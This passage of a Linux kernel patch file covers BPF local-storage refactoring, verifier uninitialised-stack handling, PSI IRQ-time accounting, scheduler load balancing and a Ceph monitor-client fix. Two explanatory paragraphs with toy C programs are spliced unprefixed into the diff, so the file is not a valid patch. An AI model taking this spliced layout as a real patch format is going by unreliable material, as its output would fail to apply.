+ 				int __percpu *busy_counter);
+ 
+ int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+@@ -141,10 +142,6 @@ int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+ void bpf_selem_link_storage_nolock(struct bpf_local_storage *local_storage,
+ 				   struct bpf_local_storage_elem *selem);
+ 
+-bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
+-				     struct bpf_local_storage_elem *selem,
+-				     bool uncharge_omem, bool use_trace_rcu);
+-
+ void bpf_selem_unlink(struct bpf_local_storage_elem *selem, bool use_trace_rcu);
+ 
+ void bpf_selem_link_map(struct bpf_local_storage_map *smap,
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index ae4c9579ca5f0..efe5e8067652b 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
+@@ -321,6 +321,18 @@
+  */
+ #define __section(section)              __attribute__((__section__(section)))
+ 
++/*
++ * Optional: only supported since gcc >= 12
++ *
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Variable-Attributes.html#index-uninitialized-variable-attribute
++ * clang: https://clang.llvm.org/docs/AttributeReference.html#uninitialized
++ */
++#if __has_attribute(__uninitialized__)
++# define __uninitialized		__attribute__((__uninitialized__))
++#else
++# define __uninitialized
++#endif
++
+ /*
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-unused-function-attribute
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Type-Attributes.html#index-unused-type-attribute
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 93d2003091222..61906244c14d6 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1814,8 +1814,9 @@ static inline int subsection_map_index(unsigned long pfn)
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ {
+ 	int idx = subsection_map_index(pfn);
++	struct mem_section_usage *usage = READ_ONCE(ms->usage);
+ 
+-	return test_bit(idx, READ_ONCE(ms->usage)->subsection_map);
++	return usage ? test_bit(idx, usage->subsection_map) : 0;
+ }
+ #else
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+diff --git a/kernel/bpf/bpf_inode_storage.c b/kernel/bpf/bpf_inode_storage.c
+index 5f7683b191998..6a1d4d22816a3 100644
+--- a/kernel/bpf/bpf_inode_storage.c
++++ b/kernel/bpf/bpf_inode_storage.c
+@@ -56,11 +56,9 @@ static struct bpf_local_storage_data *inode_storage_lookup(struct inode *inode,
+ 
+ void bpf_inode_storage_free(struct inode *inode)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *local_storage;
+ 	bool free_inode_storage = false;
+ 	struct bpf_storage_blob *bsb;
+-	struct hlist_node *n;
+ 
+ 	bsb = bpf_inode(inode);
+ 	if (!bsb)
+@@ -74,30 +72,11 @@ void bpf_inode_storage_free(struct inode *inode)
+ 		return;
+ 	}
+ 
+-	/* Neither the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the local_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * local_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the local_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	raw_spin_lock_bh(&local_storage->lock);
+-	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * local_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_inode_storage = bpf_selem_unlink_storage_nolock(
+-			local_storage, selem, false, false);
+-	}
++	free_inode_storage = bpf_local_storage_unlink_nolock(local_storage);
+ 	raw_spin_unlock_bh(&local_storage->lock);
+ 	rcu_read_unlock();
+ 
+-	/* free_inoode_storage should always be true as long as
+-	 * local_storage->list was non-empty.
+-	 */
+ 	if (free_inode_storage)
+ 		kfree_rcu(local_storage, rcu);
+ }
+@@ -226,23 +205,12 @@ static int notsupp_get_next_key(struct bpf_map *map, void *key,
+ 
+ static struct bpf_map *inode_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&inode_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &inode_cache);
+ }
+ 
+ static void inode_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&inode_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, NULL);
++	bpf_local_storage_map_free(map, &inode_cache, NULL);
+ }
+ 
+ BTF_ID_LIST_SINGLE(inode_storage_map_btf_ids, struct,
+diff --git a/kernel/bpf/bpf_local_storage.c b/kernel/bpf/bpf_local_storage.c
+index d9d88a2cda5e5..51a9f024c1829 100644
+--- a/kernel/bpf/bpf_local_storage.c
++++ b/kernel/bpf/bpf_local_storage.c
+@@ -114,9 +114,9 @@ static void bpf_selem_free_rcu(struct rcu_head *rcu)
+  * The caller must ensure selem->smap is still valid to be
+  * dereferenced for its smap->elem_size and smap->cache_idx.
+  */
+-bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
+-				     struct bpf_local_storage_elem *selem,
+-				     bool uncharge_mem, bool use_trace_rcu)
++static bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
++					    struct bpf_local_storage_elem *selem,
++					    bool uncharge_mem, bool use_trace_rcu)
+ {
+ 	struct bpf_local_storage_map *smap;
+ 	bool free_local_storage;
+@@ -501,7 +501,7 @@ bpf_local_storage_update(void *owner, struct bpf_local_storage_map *smap,
+ 	return ERR_PTR(err);
+ }
+ 
+-u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
++static u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
+ {
+ 	u64 min_usage = U64_MAX;
+ 	u16 i, res = 0;
+@@ -525,21 +525,132 @@ u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
+ 	return res;
+ }
+ 
+-void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
+-				      u16 idx)
++static void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
++					     u16 idx)
+ {
+ 	spin_lock(&cache->idx_lock);
+ 	cache->idx_usage_counts[idx]--;
+ 	spin_unlock(&cache->idx_lock);
+ }
+ 
+-void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
+-				int __percpu *busy_counter)
++int bpf_local_storage_map_alloc_check(union bpf_attr *attr)
++{
++	if (attr->map_flags & ~BPF_LOCAL_STORAGE_CREATE_FLAG_MASK ||
++	    !(attr->map_flags & BPF_F_NO_PREALLOC) ||
++	    attr->max_entries ||
++	    attr->key_size != sizeof(int) || !attr->value_size ||
++	    /* Enforce BTF for userspace sk dumping */
++	    !attr->btf_key_type_id || !attr->btf_value_type_id)
++		return -EINVAL;
++
++	if (!bpf_capable())
++		return -EPERM;
++
++	if (attr->value_size > BPF_LOCAL_STORAGE_MAX_VALUE_SIZE)
++		return -E2BIG;
++
++	return 0;
++}
++
++int bpf_local_storage_map_check_btf(const struct bpf_map *map,
++				    const struct btf *btf,
++				    const struct btf_type *key_type,
++				    const struct btf_type *value_type)
++{
++	u32 int_data;
++
++	if (BTF_INFO_KIND(key_type->info) != BTF_KIND_INT)
++		return -EINVAL;
++
++	int_data = *(u32 *)(key_type + 1);
++	if (BTF_INT_BITS(int_data) != 32 || BTF_INT_OFFSET(int_data))
++		return -EINVAL;
++
++	return 0;
++}
++
++bool bpf_local_storage_unlink_nolock(struct bpf_local_storage *local_storage)
+ {
+ 	struct bpf_local_storage_elem *selem;
++	bool free_storage = false;
++	struct hlist_node *n;
++
++	/* Neither the bpf_prog nor the bpf_map's syscall
++	 * could be modifying the local_storage->list now.
++	 * Thus, no elem can be added to or deleted from the
++	 * local_storage->list by the bpf_prog or by the bpf_map's syscall.
++	 *
++	 * It is racing with bpf_local_storage_map_free() alone
++	 * when unlinking elem from the local_storage->list and
++	 * the map's bucket->list.
++	 */
++	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
++		/* Always unlink from map before unlinking from
++		 * local_storage.
++		 */
++		bpf_selem_unlink_map(selem);
++		/* If local_storage list has only one element, the
++		 * bpf_selem_unlink_storage_nolock() will return true.
++		 * Otherwise, it will return false. This loop intends to
++		 * remove all local storage, so the last iteration will
++		 * set free_storage to true.
++		 */
++		free_storage = bpf_selem_unlink_storage_nolock(
++			local_storage, selem, false, false);
++	}
++
++	return free_storage;
++}
++
++struct bpf_map *
++bpf_local_storage_map_alloc(union bpf_attr *attr,
++			    struct bpf_local_storage_cache *cache)
++{
++	struct bpf_local_storage_map *smap;
++	unsigned int i;
++	u32 nbuckets;
++
++	smap = bpf_map_area_alloc(sizeof(*smap), NUMA_NO_NODE);
++	if (!smap)
++		return ERR_PTR(-ENOMEM);
++	bpf_map_init_from_attr(&smap->map, attr);
++
++	nbuckets = roundup_pow_of_two(num_possible_cpus());
++	/* Use at least 2 buckets, select_bucket() is undefined behavior with 1 bucket */
++	nbuckets = max_t(u32, 2, nbuckets);
++	smap->bucket_log = ilog2(nbuckets);
++
++	smap->buckets = bpf_map_kvcalloc(&smap->map, nbuckets,
++					 sizeof(*smap->buckets), GFP_USER | __GFP_NOWARN);
++	if (!smap->buckets) {
++		bpf_map_area_free(smap);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	for (i = 0; i < nbuckets; i++) {
++		INIT_HLIST_HEAD(&smap->buckets[i].list);
++		raw_spin_lock_init(&smap->buckets[i].lock);
++	}
++
++	smap->elem_size = offsetof(struct bpf_local_storage_elem,
++				   sdata.data[attr->value_size]);
++
++	smap->cache_idx = bpf_local_storage_cache_idx_get(cache);
++	return &smap->map;
++}
++
++void bpf_local_storage_map_free(struct bpf_map *map,
++				struct bpf_local_storage_cache *cache,
++				int __percpu *busy_counter)
++{
+ 	struct bpf_local_storage_map_bucket *b;
++	struct bpf_local_storage_elem *selem;
++	struct bpf_local_storage_map *smap;
+ 	unsigned int i;
+ 
++	smap = (struct bpf_local_storage_map *)map;
++	bpf_local_storage_cache_idx_free(cache, smap->cache_idx);
++
+ 	/* Note that this map might be concurrently cloned from
+ 	 * bpf_sk_storage_clone. Wait for any existing bpf_sk_storage_clone
+ 	 * RCU read section to finish before proceeding. New RCU
+@@ -594,73 +705,3 @@ void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
+ 	kvfree(smap->buckets);
+ 	bpf_map_area_free(smap);
+ }
+-
+-int bpf_local_storage_map_alloc_check(union bpf_attr *attr)
+-{
+-	if (attr->map_flags & ~BPF_LOCAL_STORAGE_CREATE_FLAG_MASK ||
+-	    !(attr->map_flags & BPF_F_NO_PREALLOC) ||
+-	    attr->max_entries ||
+-	    attr->key_size != sizeof(int) || !attr->value_size ||
+-	    /* Enforce BTF for userspace sk dumping */
+-	    !attr->btf_key_type_id || !attr->btf_value_type_id)
+-		return -EINVAL;
+-
+-	if (!bpf_capable())
+-		return -EPERM;
+-
+-	if (attr->value_size > BPF_LOCAL_STORAGE_MAX_VALUE_SIZE)
+-		return -E2BIG;
+-
+-	return 0;
+-}
+-
+-struct bpf_local_storage_map *bpf_local_storage_map_alloc(union bpf_attr *attr)
+-{
+-	struct bpf_local_storage_map *smap;
+-	unsigned int i;
+-	u32 nbuckets;
+-
+-	smap = bpf_map_area_alloc(sizeof(*smap), NUMA_NO_NODE);
+-	if (!smap)
+-		return ERR_PTR(-ENOMEM);
+-	bpf_map_init_from_attr(&smap->map, attr);
+-
+-	nbuckets = roundup_pow_of_two(num_possible_cpus());
+-	/* Use at least 2 buckets, select_bucket() is undefined behavior with 1 bucket */
+-	nbuckets = max_t(u32, 2, nbuckets);
+-	smap->bucket_log = ilog2(nbuckets);
+-
+-	smap->buckets = kvcalloc(sizeof(*smap->buckets), nbuckets,
+-				 GFP_USER | __GFP_NOWARN | __GFP_ACCOUNT);
+-	if (!smap->buckets) {
+-		bpf_map_area_free(smap);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	for (i = 0; i < nbuckets; i++) {
+-		INIT_HLIST_HEAD(&smap->buckets[i].list);
+-		raw_spin_lock_init(&smap->buckets[i].lock);
+-	}
+-
+-	smap->elem_size =
+-		sizeof(struct bpf_local_storage_elem) + attr->value_size;
+-
+-	return smap;
+-}
+-
+-int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+-				    const struct btf *btf,
+-				    const struct btf_type *key_type,
+-				    const struct btf_type *value_type)
+-{
+-	u32 int_data;
+-
+-	if (BTF_INFO_KIND(key_type->info) != BTF_KIND_INT)
+-		return -EINVAL;
+-
+-	int_data = *(u32 *)(key_type + 1);
+-	if (BTF_INT_BITS(int_data) != 32 || BTF_INT_OFFSET(int_data))
+-		return -EINVAL;
+-
+-	return 0;
+-}
+diff --git a/kernel/bpf/bpf_task_storage.c b/kernel/bpf/bpf_task_storage.c
+index 6f290623347e0..40a92edd6f539 100644
+--- a/kernel/bpf/bpf_task_storage.c
++++ b/kernel/bpf/bpf_task_storage.c
+@@ -71,10 +71,8 @@ task_storage_lookup(struct task_struct *task, struct bpf_map *map,
+ 
+ void bpf_task_storage_free(struct task_struct *task)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *local_storage;
+ 	bool free_task_storage = false;
+-	struct hlist_node *n;
+ 	unsigned long flags;
+ 
+ 	rcu_read_lock();
+@@ -85,32 +83,13 @@ void bpf_task_storage_free(struct task_struct *task)
+ 		return;
+ 	}
+ 
+-	/* Neither the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the local_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * local_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the local_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	bpf_task_storage_lock();
+ 	raw_spin_lock_irqsave(&local_storage->lock, flags);
+-	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * local_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_task_storage = bpf_selem_unlink_storage_nolock(
+-			local_storage, selem, false, false);
+-	}
++	free_task_storage = bpf_local_storage_unlink_nolock(local_storage);
+ 	raw_spin_unlock_irqrestore(&local_storage->lock, flags);
+ 	bpf_task_storage_unlock();
+ 	rcu_read_unlock();
+ 
+-	/* free_task_storage should always be true as long as
+-	 * local_storage->list was non-empty.
+-	 */
+ 	if (free_task_storage)
+ 		kfree_rcu(local_storage, rcu);
+ }
+@@ -288,23 +267,12 @@ static int notsupp_get_next_key(struct bpf_map *map, void *key, void *next_key)
+ 
+ static struct bpf_map *task_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&task_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &task_cache);
+ }
+ 
+ static void task_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&task_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, &bpf_task_storage_busy);
++	bpf_local_storage_map_free(map, &task_cache, &bpf_task_storage_busy);
+ }
+ 
+ BTF_ID_LIST_SINGLE(task_storage_map_btf_ids, struct, bpf_local_storage_map)
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 1e46a84694b8a..d77597daa0022 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -470,6 +470,21 @@ void *bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags)
+ 	return ptr;
+ }
+ 
++void *bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size,
++		       gfp_t flags)
++{
++	struct mem_cgroup *memcg, *old_memcg;
++	void *ptr;
++
++	memcg = bpf_map_get_memcg(map);
++	old_memcg = set_active_memcg(memcg);
++	ptr = kvcalloc(n, size, flags | __GFP_ACCOUNT);
++	set_active_memcg(old_memcg);
++	mem_cgroup_put(memcg);
++
++	return ptr;
++}
++
+ void __percpu *bpf_map_alloc_percpu(const struct bpf_map *map, size_t size,
+ 				    size_t align, gfp_t flags)
+ {
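The new bpf_map_kvcalloc() follows the same save/switch/restore shape
as the surrounding helpers: activate the map's memcg, allocate with
__GFP_ACCOUNT, then restore the previous context. The generic pattern,
with a global "active context" standing in for the memcg (illustrative
only):

#include <stdio.h>
#include <stdlib.h>

static int active_ctx;			/* stands in for the active memcg */

static int set_active_ctx(int ctx)
{
	int old = active_ctx;

	active_ctx = ctx;
	return old;
}

static void *ctx_calloc(int ctx, size_t n, size_t size)
{
	int old = set_active_ctx(ctx);	/* charge allocations here... */
	void *p = calloc(n, size);

	set_active_ctx(old);		/* ...and always restore */
	return p;
}

int main(void)
{
	void *p = ctx_calloc(42, 4, 16);

	printf("alloc %s, ctx restored to %d\n", p ? "ok" : "failed", active_ctx);
	free(p);
	return 0;
}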
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 56a5c8beb553d..8973d3c9597ce 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3599,6 +3599,8 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 						continue;
+ 					if (type == STACK_MISC)
+ 						continue;
++					if (type == STACK_INVALID && env->allow_uninit_stack)
++						continue;
+ 					verbose(env, "invalid read from stack off %d+%d size %d\n",
+ 						off, i, size);
+ 					return -EACCES;
+@@ -3636,6 +3638,8 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 				continue;
+ 			if (type == STACK_ZERO)
+ 				continue;
++			if (type == STACK_INVALID && env->allow_uninit_stack)
++				continue;
+ 			verbose(env, "invalid read from stack off %d+%d size %d\n",
+ 				off, i, size);
+ 			return -EACCES;
+@@ -5426,7 +5430,8 @@ static int check_stack_range_initialized(
+ 		stype = &state->stack[spi].slot_type[slot % BPF_REG_SIZE];
+ 		if (*stype == STACK_MISC)
+ 			goto mark;
+-		if (*stype == STACK_ZERO) {
++		if ((*stype == STACK_ZERO) ||
++		    (*stype == STACK_INVALID && env->allow_uninit_stack)) {
+ 			if (clobber) {
+ 				/* helper can write anything into the stack */
+ 				*stype = STACK_MISC;
+@@ -11967,6 +11972,10 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 		if (old->stack[spi].slot_type[i % BPF_REG_SIZE] == STACK_INVALID)
+ 			continue;
+ 
++		if (env->allow_uninit_stack &&
++		    old->stack[spi].slot_type[i % BPF_REG_SIZE] == STACK_MISC)
++			continue;
++
+ 		/* explored stack has more populated slots than current stack
+ 		 * and these slots were used
+ 		 */
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index d71234729edb4..cac41c49bd2f5 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -701,7 +701,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -5500,7 +5499,7 @@ void scheduler_tick(void)
+ {
+ 	int cpu = smp_processor_id();
+ 	struct rq *rq = cpu_rq(cpu);
+-	struct task_struct *curr = rq->curr;
++	struct task_struct *curr;
+ 	struct rq_flags rf;
+ 	unsigned long thermal_pressure;
+ 	u64 resched_latency;
+@@ -5512,6 +5511,9 @@ void scheduler_tick(void)
+ 
+ 	rq_lock(rq, &rf);
+ 
++	curr = rq->curr;
++	psi_account_irqtime(rq, curr, NULL);
++
+ 	update_rq_clock(rq);
+ 	thermal_pressure = arch_scale_thermal_pressure(cpu_of(rq));
+ 	update_thermal_load_avg(rq_clock_thermal(rq), rq, thermal_pressure);
+@@ -6550,6 +6552,7 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		++*switch_count;
+ 
+ 		migrate_disable_switch(rq, prev);
++		psi_account_irqtime(rq, prev, next);
+ 		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+ 
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0de8354d5ad0a..d0851610cf467 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -8479,12 +8479,8 @@ static int detach_tasks(struct lb_env *env)
+ 			break;
+ 
+ 		env->loop++;
+-		/*
+-		 * We've more or less seen every task there is, call it quits
+-		 * unless we haven't found any movable task yet.
+-		 */
+-		if (env->loop > env->loop_max &&
+-		    !(env->flags & LBF_ALL_PINNED))
++		/* We've more or less seen every task there is, call it quits */
++		if (env->loop > env->loop_max)
+ 			break;
+ 
+ 		/* take a breather every nr_migrate tasks */
+@@ -10623,9 +10619,7 @@ static int load_balance(int this_cpu, struct rq *this_rq,
+ 
+ 		if (env.flags & LBF_NEED_BREAK) {
+ 			env.flags &= ~LBF_NEED_BREAK;
+-			/* Stop if we tried all running tasks */
+-			if (env.loop < busiest->nr_running)
+-				goto more_balance;
++			goto more_balance;
+ 		}
+ 
+ 		/*
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 80d8c10e93638..81dbced92df5f 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -785,6 +785,7 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 	enum psi_states s;
+ 	u32 state_mask;
+ 
++	lockdep_assert_rq_held(cpu_rq(cpu));
+ 	groupc = per_cpu_ptr(group->pcpu, cpu);
+ 
+ 	/*
+@@ -1003,19 +1004,29 @@ void psi_task_switch(struct task_struct *prev, struct task_struct *next,
+ }
+ 
+ #ifdef CONFIG_IRQ_TIME_ACCOUNTING
+-void psi_account_irqtime(struct task_struct *task, u32 delta)
++void psi_account_irqtime(struct rq *rq, struct task_struct *curr, struct task_struct *prev)
+ {
+-	int cpu = task_cpu(task);
++	int cpu = task_cpu(curr);
+ 	struct psi_group *group;
+ 	struct psi_group_cpu *groupc;
+-	u64 now;
++	u64 now, irq;
++	s64 delta;
+ 
+-	if (!task->pid)
++	if (!curr->pid)
++		return;
++
++	lockdep_assert_rq_held(rq);
++	group = task_psi_group(curr);
++	if (prev && task_psi_group(prev) == group)
+ 		return;
+ 
+ 	now = cpu_clock(cpu);
++	irq = irq_time_read(cpu);
++	delta = (s64)(irq - rq->psi_irq_time);
++	if (delta < 0)
++		return;
++	rq->psi_irq_time = irq;
+ 
+-	group = task_psi_group(task);
+ 	do {
+ 		if (!group->enabled)
+ 			continue;
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index b62d53d7c264f..81d9698f0a1eb 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1084,6 +1084,7 @@ struct rq {
+ 
+ #ifdef CONFIG_IRQ_TIME_ACCOUNTING
+ 	u64			prev_irq_time;
++	u64			psi_irq_time;
+ #endif
+ #ifdef CONFIG_PARAVIRT
+ 	u64			prev_steal_time;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9d..b49a96fad1d2f 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -110,8 +110,12 @@ __schedstats_from_se(struct sched_entity *se)
+ void psi_task_change(struct task_struct *task, int clear, int set);
+ void psi_task_switch(struct task_struct *prev, struct task_struct *next,
+ 		     bool sleep);
+-void psi_account_irqtime(struct task_struct *task, u32 delta);
+-
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++void psi_account_irqtime(struct rq *rq, struct task_struct *curr, struct task_struct *prev);
++#else
++static inline void psi_account_irqtime(struct rq *rq, struct task_struct *curr,
++				       struct task_struct *prev) {}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
+ /*
+  * PSI tracks state that persists across sleeps, such as iowaits and
+  * memory stalls. As a result, it has to distinguish between sleeps,
+@@ -206,7 +210,8 @@ static inline void psi_ttwu_dequeue(struct task_struct *p) {}
+ static inline void psi_sched_switch(struct task_struct *prev,
+ 				    struct task_struct *next,
+ 				    bool sleep) {}
+-static inline void psi_account_irqtime(struct task_struct *task, u32 delta) {}
++static inline void psi_account_irqtime(struct rq *rq, struct task_struct *curr,
++				       struct task_struct *prev) {}
+ #endif /* CONFIG_PSI */
+ 
+ #ifdef CONFIG_SCHED_INFO
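The reworked psi_account_irqtime() keeps a per-runqueue cursor
(psi_irq_time) into the monotonically increasing IRQ-time counter and
charges only the delta since the previous visit, discarding apparent
negative deltas. A stripped-down model of that accounting:

#include <stdint.h>
#include <stdio.h>

static uint64_t cursor;		/* rq->psi_irq_time in the patch */

static int64_t account_delta(uint64_t counter_now)
{
	int64_t delta = (int64_t)(counter_now - cursor);

	if (delta < 0)
		return 0;	/* counter appeared to go backwards: skip */
	cursor = counter_now;
	return delta;
}

int main(void)
{
	printf("%lld\n", (long long)account_delta(100));	/* 100 */
	printf("%lld\n", (long long)account_delta(250));	/* 150 */
	printf("%lld\n", (long long)account_delta(240));	/* 0 */
	return 0;
}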
+diff --git a/net/ceph/mon_client.c b/net/ceph/mon_client.c
+index db60217f911b3..2cf1254fd4522 100644
+--- a/net/ceph/mon_client.c
++++ b/net/ceph/mon_client.c
+@@ -1085,13 +1085,19 @@ static void delayed_work(struct work_struct *work)
+ 	struct ceph_mon_client *monc =
+ 		container_of(work, struct ceph_mon_client, delayed_work.work);
+ 
+-	dout("monc delayed_work\n");
+ 	mutex_lock(&monc->mutex);
++	dout("%s mon%d\n", __func__, monc->cur_mon);
++	if (monc->cur_mon < 0) {
++		goto out;
++	}
++
+ 	if (monc->hunting) {
+ 		dout("%s continuing hunt\n", __func__);
+ 		reopen_session(monc);
+ 	} else {
+ 		int is_auth = ceph_auth_is_authenticated(monc->auth);
++
++		dout("%s is_authed %d\n", __func__, is_auth);
+ 		if (ceph_con_keepalive_expired(&monc->con,
+ 					       CEPH_MONC_PING_TIMEOUT)) {
+ 			dout("monc keepalive timeout\n");
+@@ -1116,6 +1122,8 @@ static void delayed_work(struct work_struct *work)
+ 		}
+ 	}
+ 	__schedule_delayed(monc);
++
++out:
+ 	mutex_unlock(&monc->mutex);
+ }
+ 
+@@ -1232,13 +1240,15 @@ EXPORT_SYMBOL(ceph_monc_init);
+ void ceph_monc_stop(struct ceph_mon_client *monc)
+ {
+ 	dout("stop\n");
+-	cancel_delayed_work_sync(&monc->delayed_work);
+ 
+ 	mutex_lock(&monc->mutex);
+ 	__close_session(monc);
++	monc->hunting = false;
+ 	monc->cur_mon = -1;
+ 	mutex_unlock(&monc->mutex);
+ 
++	cancel_delayed_work_sync(&monc->delayed_work);
++
+ 	/*
+ 	 * flush msgr queue before we destroy ourselves to ensure that:
+ 	 *  - any work that references our embedded con is finished.
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index ad01b1bea52e4..0124536e8a9db 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -48,10 +48,8 @@ static int bpf_sk_storage_del(struct sock *sk, struct bpf_map *map)
+ /* Called by __sk_destruct() & bpf_sk_storage_clone() */
+ void bpf_sk_storage_free(struct sock *sk)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *sk_storage;
+ 	bool free_sk_storage = false;
+-	struct hlist_node *n;
+ 
+ 	rcu_read_lock();
+ 	sk_storage = rcu_dereference(sk->sk_bpf_storage);
+@@ -60,24 +58,8 @@ void bpf_sk_storage_free(struct sock *sk)
+ 		return;
+ 	}
+ 
+-	/* Netiher the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the sk_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * sk_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the sk_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	raw_spin_lock_bh(&sk_storage->lock);
+-	hlist_for_each_entry_safe(selem, n, &sk_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * sk_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_sk_storage = bpf_selem_unlink_storage_nolock(
+-			sk_storage, selem, true, false);
+-	}
++	free_sk_storage = bpf_local_storage_unlink_nolock(sk_storage);
+ 	raw_spin_unlock_bh(&sk_storage->lock);
+ 	rcu_read_unlock();
+ 
+@@ -87,23 +69,12 @@ void bpf_sk_storage_free(struct sock *sk)
+ 
+ static void bpf_sk_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&sk_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, NULL);
++	bpf_local_storage_map_free(map, &sk_cache, NULL);
+ }
+ 
+ static struct bpf_map *bpf_sk_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
